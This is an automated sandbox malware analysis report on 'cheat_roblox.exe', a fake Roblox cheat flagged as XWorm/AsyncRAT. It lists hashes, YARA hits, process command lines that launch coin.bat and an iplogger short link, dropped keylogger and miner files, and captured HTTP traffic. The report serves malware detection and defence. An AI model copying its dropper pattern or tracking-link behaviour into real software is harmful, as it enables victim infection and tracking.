Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cheat_roblox.exe

Overview

General Information

Sample name:cheat_roblox.exe
Analysis ID:1484385
MD5:d49b1a211ce49bed3e766471501819c6
SHA1:ed8f8b0d45ad556115c14a00247c080fa82d56e9
SHA256:1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
Tags:exe
Infos:

Detection

XWorm
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cheat_roblox.exe (PID: 3192 cmdline: "C:\Users\user\Desktop\cheat_roblox.exe" MD5: D49B1A211CE49BED3E766471501819C6)
    • cmd.exe (PID: 4180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5020 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 6712 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 3136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1980,i,3286908272416009532,3896627819344561856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • RobloxPlayerInstaller.exe (PID: 1220 cmdline: "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" MD5: 27469372591B14FF1C57654FACB5E020)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\ msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\ msedge.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7aa6:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Local\Temp\Keyloger.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\Keyloger.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xf0e7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf184:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf299:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xdb4c:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x7d38:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x7dd5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x7eea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x79e6:$cnc4: POST / HTTP/1.1
          Process Memory Space: cheat_roblox.exe PID: 3192JoeSecurity_XWormYara detected XWormJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-30T00:56:50.218743+0200
            SID:2022930
            Source Port:443
            Destination Port:49730
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-30T00:57:27.842535+0200
            SID:2022930
            Source Port:443
            Destination Port:49753
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeAvira: detection malicious, Label: TR/Spy.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeReversingLabs: Detection: 81%
            Multi AV Scanner detection for submitted file
            Source: cheat_roblox.exeReversingLabs: Detection: 59%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: cheat_roblox.exeJoe Sandbox ML: detected
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f3f82e14-9
            Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49738 version: TLS 1.0
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_2ACC2.logJump to behavior
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.32.185.164:443 -> 192.168.2.6:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58797 version: TLS 1.2
            Source: cheat_roblox.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.8.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD565E9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E7B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E7B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E640BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E640BC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E8FCA0 FindFirstFileExA,0_2_00007FF693E8FCA0
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\coin.batJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\RobloxJump to behavior
            Source: global trafficTCP traffic: 192.168.2.6:58786 -> 1.1.1.1:53
            Source: Joe Sandbox ViewIP Address: 88.212.201.198 88.212.201.198
            Source: Joe Sandbox ViewIP Address: 104.21.79.229 104.21.79.229
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49738 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: unknownTCP traffic detected without corresponding DNS query: 23.32.185.164
            Source: global trafficHTTP traffic detected: GET /24RXx6 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /redirect/handshake.png HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1Host: counter.yadro.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O; VID=2DNPIG0nbdur1cg1uq002NPY
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficDNS traffic detected: DNS query: client-telemetry.roblox.com
            Source: global trafficDNS traffic detected: DNS query: ecsv2.roblox.com
            Source: global trafficDNS traffic detected: DNS query: clientsettingscdn.roblox.com
            Source: global trafficDNS traffic detected: DNS query: 2no.co
            Source: global trafficDNS traffic detected: DNS query: cdn.iplogger.org
            Source: global trafficDNS traffic detected: DNS query: counter.yadro.ru
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
